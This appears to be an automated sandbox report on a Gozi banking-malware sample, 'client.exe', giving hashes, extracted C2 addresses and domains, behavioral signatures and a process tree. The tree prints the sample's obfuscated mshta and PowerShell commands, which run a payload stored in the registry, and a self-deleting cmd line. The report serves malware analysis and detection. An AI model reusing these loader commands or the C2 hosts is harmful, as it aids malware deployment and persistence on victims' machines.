Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2023 12:18
Static task
static1
Behavioral task
behavioral1
Sample
client.exe
Resource
win7-20230831-en
General
-
Target
client.exe
-
Size
295KB
-
MD5
ed017c0f334b6d10ac5aca77fe7f9a2a
-
SHA1
de7a838cbf418f5c093e5bed00254c4c68b82fa7
-
SHA256
9f710a0fc0cadbf3378c06ca4fefa2486bdf04646201f9efec7cd5a4c97634b4
-
SHA512
e7210ef6cfb8b9cad8078b8bdc4331eba04c9b7bd87b1aadce8c84560035fe4725161dceaca03608f10f7e02de7120c6dbf345c0ac69c72d5613e85080f58316
-
SSDEEP
3072:Az6N1tmvikka83g9IGkpt4fMlw5mlg9eidid74+VONrRrCS:bN1cvBka83g9PkUf55B++1r
Malware Config
Extracted
gozi
Extracted
gozi
5050
185.247.184.139
62.72.33.155
incontroler.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
expirew.com
whofos.com
onlinepoints.online
onlinepoints.top
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 3084 set thread context of 3140 3084 powershell.exe Explorer.EXE PID 3140 set thread context of 3688 3140 Explorer.EXE RuntimeBroker.exe PID 3140 set thread context of 3940 3140 Explorer.EXE RuntimeBroker.exe PID 3140 set thread context of 4804 3140 Explorer.EXE RuntimeBroker.exe PID 3140 set thread context of 2836 3140 Explorer.EXE RuntimeBroker.exe PID 3140 set thread context of 1720 3140 Explorer.EXE cmd.exe PID 3140 set thread context of 2060 3140 Explorer.EXE cmd.exe PID 1720 set thread context of 2300 1720 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4244 2176 WerFault.exe client.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 2300 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
client.exepowershell.exeExplorer.EXEpid process 2176 client.exe 2176 client.exe 3084 powershell.exe 3084 powershell.exe 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 3084 powershell.exe 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 3140 Explorer.EXE 1720 cmd.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 3084 powershell.exe Token: SeShutdownPrivilege 3140 Explorer.EXE Token: SeCreatePagefilePrivilege 3140 Explorer.EXE Token: SeShutdownPrivilege 3140 Explorer.EXE Token: SeCreatePagefilePrivilege 3140 Explorer.EXE Token: SeShutdownPrivilege 3140 Explorer.EXE Token: SeCreatePagefilePrivilege 3140 Explorer.EXE Token: SeShutdownPrivilege 3140 Explorer.EXE Token: SeCreatePagefilePrivilege 3140 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3140 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3140 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 2732 wrote to memory of 3084 2732 mshta.exe powershell.exe PID 2732 wrote to memory of 3084 2732 mshta.exe powershell.exe PID 3084 wrote to memory of 3948 3084 powershell.exe csc.exe PID 3084 wrote to memory of 3948 3084 powershell.exe csc.exe PID 3948 wrote to memory of 2704 3948 csc.exe cvtres.exe PID 3948 wrote to memory of 2704 3948 csc.exe cvtres.exe PID 3084 wrote to memory of 3320 3084 powershell.exe csc.exe PID 3084 wrote to memory of 3320 3084 powershell.exe csc.exe PID 3320 wrote to memory of 1020 3320 csc.exe cvtres.exe PID 3320 wrote to memory of 1020 3320 csc.exe cvtres.exe PID 3084 wrote to memory of 3140 3084 powershell.exe Explorer.EXE PID 3084 wrote to memory of 3140 3084 powershell.exe Explorer.EXE PID 3084 wrote to memory of 3140 3084 powershell.exe Explorer.EXE PID 3084 wrote to memory of 3140 3084 powershell.exe Explorer.EXE PID 3140 wrote to memory of 3688 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 3688 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 3688 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 3688 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 3940 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 3940 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 3940 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 3940 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 4804 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 4804 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 4804 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 4804 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 2836 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 2836 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 1720 3140 Explorer.EXE cmd.exe PID 3140 wrote to memory of 1720 3140 Explorer.EXE cmd.exe PID 3140 wrote to memory of 1720 3140 Explorer.EXE cmd.exe PID 3140 wrote to memory of 2836 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 2836 3140 Explorer.EXE RuntimeBroker.exe PID 3140 wrote to memory of 2060 3140 Explorer.EXE cmd.exe PID 3140 wrote to memory of 2060 3140 Explorer.EXE cmd.exe PID 3140 wrote to memory of 2060 3140 Explorer.EXE cmd.exe PID 3140 wrote to memory of 2060 3140 Explorer.EXE cmd.exe PID 3140 wrote to memory of 1720 3140 Explorer.EXE cmd.exe PID 3140 wrote to memory of 1720 3140 Explorer.EXE cmd.exe PID 1720 wrote to memory of 2300 1720 cmd.exe PING.EXE PID 1720 wrote to memory of 2300 1720 cmd.exe PING.EXE PID 1720 wrote to memory of 2300 1720 cmd.exe PING.EXE PID 3140 wrote to memory of 2060 3140 Explorer.EXE cmd.exe PID 3140 wrote to memory of 2060 3140 Explorer.EXE cmd.exe PID 1720 wrote to memory of 2300 1720 cmd.exe PING.EXE PID 1720 wrote to memory of 2300 1720 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3688
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4804
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3940
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Users\Admin\AppData\Local\Temp\client.exe"C:\Users\Admin\AppData\Local\Temp\client.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2176 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 5683⤵
- Program crash
PID:4244 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Rnu3='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rnu3).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nibynxj -value gp; new-alias -name mmftlvf -value iex; mmftlvf ([System.Text.Encoding]::ASCII.GetString((nibynxj "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\znxdwba1\znxdwba1.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFCF9.tmp" "c:\Users\Admin\AppData\Local\Temp\znxdwba1\CSCEB3CE4E826074772BA86D422BD5F2A5D.TMP"5⤵PID:2704
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dz4dqpsc\dz4dqpsc.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFDB4.tmp" "c:\Users\Admin\AppData\Local\Temp\dz4dqpsc\CSCB7AE3EE8FB3C4BFB80F18FCBEF2DFCE.TMP"5⤵PID:1020
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2300 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:2060
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2176 -ip 21761⤵PID:4412
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f812c51024f1dc2fd8334de8b1a279f0
SHA1f01302ec4e00df087958b20fab0fd20c277b58b9
SHA25694ae8635e4bc53f443c70d6e74e136435381fe2e4a60cd5243afe3938ff40bf1
SHA512fee9b59c3d38815addd8f77ab5cd1f0c775d8179b7abd298913cd8dd6a3aa4ff36e3d69c89890a08e6bed6ae98214516eaee33a83d9b54aea35a8904b33369de
-
Filesize
1KB
MD50fc131d0cebda4cf4c90969e9e07c46f
SHA16d6fbed60f54c1addc7078a50cb1a869b9bea0c6
SHA2569a6975edf5cef7f92be1803434fdafdc7e29c6e4562c7f17909199fee03819e7
SHA512a002a36fcc12f1a996baa2109aec76aef6046dc732e3397411ba6c0288c439832bcfe1231e3ab9100d7543f5785f9356fee0dcca26018447fca26e279ac99c0c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5513c08402a1ddb5567952d0b91ca2fa6
SHA1ec4385a6c21ee3af73735116531b3765670a9589
SHA256dedf7d9b921c8177917a36c8f00059b5641f9c50c2e5e3f215f70aec5ea46cb6
SHA5128139d1d2a8277a1fd7b27c5d5a7f5de5a4d0bcdd6653c22752732ad632150ab4b26f24780d35eb6e22d88c4055816f8d3951882f87d7f4a457f8a99724c5658f
-
Filesize
3KB
MD5f3b16d83b55e3ae8b92dd0305ebac3fd
SHA1ccf214c5c95e7901945c4977e3cdb30fed1d078c
SHA2566b57073b1f0593fdc704cc66e06c16f08505d27f5d3c08ab08d65969263073ef
SHA5125f9bd421b986086117dc0c1a14e0eb78c5a735818cc160c4a6aa6fb7bf4b8685aefe1539877c07f17f792ba44a795230125fd34c3b7b9f84e66ac9d29ed0b362
-
Filesize
652B
MD5ac23d16b6fa50af35a2c9aa23e49bd5f
SHA1ae74ad4b13b017cce6654fea05afdbe1aadcb1e6
SHA2565b31e9f6d9aec5007b84a550a4da6f99ee8ac670f1dce41bd41bd415cba4f743
SHA512d6a50fc80e9f9a168ed7c3edb7d56938a03fde8ac5bc9c4a92861c64c727b0227dc393d97bab87816ce6a3f298f460cce8404d57c6edbde116fd9607fe9a7f03
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD5d3016ac52042cb7b49f5c361283205be
SHA18df27beccc7431b7d7ed41eb643a651cb7fe9648
SHA2563515ff94d76f36241ce3f1fbc9bbd55e36debf5c3484d06fd765e75cbb463181
SHA5124d83dd630a1d5ff5b8d6d882684ac0059e309823c6b63e6e5135f31b5a7ee1e84bda5c6a7b6f5d28541513a64dc7b466825dffa34aa9b6c164816fd37857a734
-
Filesize
652B
MD54bf03f542f1fbdaa14b3caf0fc0c4864
SHA1f4ed08ae4a89adad8c4ac1c95919d67214600c2c
SHA2561b2f0e198375afdd6e0acc10cbcd18746dd6129710e788b68b1292350cd55c29
SHA512209ddcbcb3d819d96ab9b44c3a10415a36b3fa78eb926a829fde06e55f4f09d1327b64fea187b5ef62eb50370abac7de810bfdf2ccc0e13cd13ba35f293a6659
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD53e9284a0c4b5e475f3f3107802b14c01
SHA14f1a34fb13f4c447ea8941729c816887a9cf474d
SHA2561fd276e2272df724ee29672199b3ee0b5e407b55612094bfdcd49492f3967b1d
SHA51211afb13e26edce57e5ed99f8d88612256e1105a75be938ad3f8a085b3c53f754e5c9f6cfcf2a4ebb91ff303c9437aa55633cc505256105327080aa4649234edf